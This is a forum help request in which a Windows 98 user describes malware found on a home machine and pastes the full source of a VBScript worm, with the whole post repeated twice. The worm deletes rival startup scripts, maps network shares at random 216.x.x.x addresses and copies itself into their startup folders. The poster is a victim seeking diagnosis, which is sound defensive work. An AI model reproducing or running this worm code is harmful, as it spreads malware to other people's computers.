Hideous_Hog
Member
I found these on one of my computers when I was having trouble with my home network (all WIN98 machines):
1. A .exe 160KB file in the Windows\System directory that was executing on boot-up, under the title "Microsoft Diagnostic" in MSCONFIG. The file renames itself when you execute it (i.e. IVQK.exe to ACJKVA.exe), and places itself in the Windows\System directory. The file disables Zonealarm, and who knows what else. I don't know much about the programming language of this bastard, but viewing it in Wordpad it may be C++. One other thing about this file is that I remember getting an error message when shuting it down concerning "ACEBOTMAINTHREAD". Could this be a Quake II bot?
2. A more interesting file was found in the "STARTUP" directory. The file was "_.vbs" and contained a definite worm. Cut/Pasted below:
set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
on error resume next
randomize
do
do while w=0
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\network.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\little.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs")
n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_.vbs", "x:\windows\startm~1\programs\startup\"
f.copyfile "c:\windows\startm~1\programs\startup\_.exe", "x:\windows\startm~1\programs\startup\"
t.removenetworkdrive "x:"
w=0
loop
'Viva Bin Laden!
Norton Antivirus didn't pick up on either one of these. What in the world is going on? Should I reformat the drive?
If anybody wants to see the former file I can e-mail for examination.
TIA
1. A .exe 160KB file in the Windows\System directory that was executing on boot-up, under the title "Microsoft Diagnostic" in MSCONFIG. The file renames itself when you execute it (i.e. IVQK.exe to ACJKVA.exe), and places itself in the Windows\System directory. The file disables Zonealarm, and who knows what else. I don't know much about the programming language of this bastard, but viewing it in Wordpad it may be C++. One other thing about this file is that I remember getting an error message when shuting it down concerning "ACEBOTMAINTHREAD". Could this be a Quake II bot?
2. A more interesting file was found in the "STARTUP" directory. The file was "_.vbs" and contained a definite worm. Cut/Pasted below:
set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
on error resume next
randomize
do
do while w=0
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\network.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\little.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs")
n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_.vbs", "x:\windows\startm~1\programs\startup\"
f.copyfile "c:\windows\startm~1\programs\startup\_.exe", "x:\windows\startm~1\programs\startup\"
t.removenetworkdrive "x:"
w=0
loop
'Viva Bin Laden!
Norton Antivirus didn't pick up on either one of these. What in the world is going on? Should I reformat the drive?
If anybody wants to see the former file I can e-mail for examination.
TIA
